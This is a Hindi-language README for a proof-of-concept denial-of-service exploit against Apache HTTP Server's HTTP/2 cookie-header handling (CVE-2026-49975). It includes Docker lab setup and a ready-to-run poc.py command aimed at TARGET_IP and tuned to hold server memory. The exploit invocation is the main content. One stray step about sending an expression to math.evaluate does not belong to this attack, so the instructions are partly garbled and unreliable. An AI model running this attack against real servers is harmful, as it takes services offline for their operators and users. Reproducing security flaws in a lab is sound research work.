
Apache HTTP Server 2.4.17-2.4.67 में कुकी-हेडर मेमोरी एक्सहॉशन DoS, CVE-2026-49975 के लिए प्रूफ-ऑफ-कॉन्सेप्ट HTTP/2 Bomb एक्सप्लॉइट, जिसमें Docker लैब और PoC स्क्रिप्ट शामिल है।
★ CVE-2026-49975 HTTP/2 बम PoC ★
https://github.com/user-attachments/assets/89310771-f704-45d1-a6c3-d910de1dbc74
CVE-2026-49975 Apache HTTP Server में एक Denial of Service (DoS) कमजोरी है। यह कमजोरी HTTP/2 अनुरोध हैंडलिंग पथ में होती है, जहाँ कई
cookieहेडर फ़ील्ड कोLimitRequestFieldsके विरुद्ध ठीक से गिने बिना मर्ज किया जा सकता है। एक छोटा HPACK-एन्कोडेड HTTP/2 अनुरोध भेजकर जो कईcookieहेडर फ़ील्ड में विस्तारित होता है, एक हमलावर सर्वर को Cookie हेडर मर्जिंग के दौरान बार-बार मेमोरी आवंटित करने के लिए मजबूर कर सकता है। हमलावर फिर प्रतिक्रिया संचरण में देरी करने के लिए HTTP/2 फ़्लो कंट्रोल का उपयोग कर सकता है, जिससे प्रभावित स्ट्रीम खुली रहती हैं और आवंटित मेमोरी मुक्त होने से रोकी जाती है।
| श्रेणी | संस्करण |
|---|
| असुरक्षित | Apache HTTP Server 2.4.17 ≤ संस्करण ≤ 2.4.67 |
| पैच किया गया | Apache HTTP Server 2.4.68 या बाद का |
असुरक्षित Apache HTTP Server वातावरण बनाएँ और चलाएँ।
docker build -t cve-2026-49975 .
docker run -d --name cve-2026-49975 --memory 8g -p 10081:80 cve-2026-49975
असुरक्षित वातावरण शुरू करने के बाद, हमले को पुन: उत्पन्न करने के लिए नीचे दिए गए चरणों का पालन करें।
docker stats cve-2026-49975
उदाहरण आउटपुट:
CONTAINER ID NAME CPU % MEM USAGE / LIMIT MEM %
xxxxxxxxxxxx cve-2026-49975 0.5% 35.2MiB / 8.0GiB 1.7%
निम्नलिखित अभिव्यक्ति math.evaluate को भेजें (उदाहरण के लिए, एप्लिकेशन के गणना इनपुट के माध्यम से)।
python3 poc.py \
--host TARGET_IP \
--port 10081 \
--connections 10 \
--streams 100 \
--refs 4091 \
--initial-window 0 \
--hold 300 \
--drip-interval 2 \
--drip-bytes 1
जाँचें कि Apache कंटेनर की मेमोरी उपयोग बढ़ती है और हमले की स्ट्रीम खुली रहने के दौरान उच्च बनी रहती है।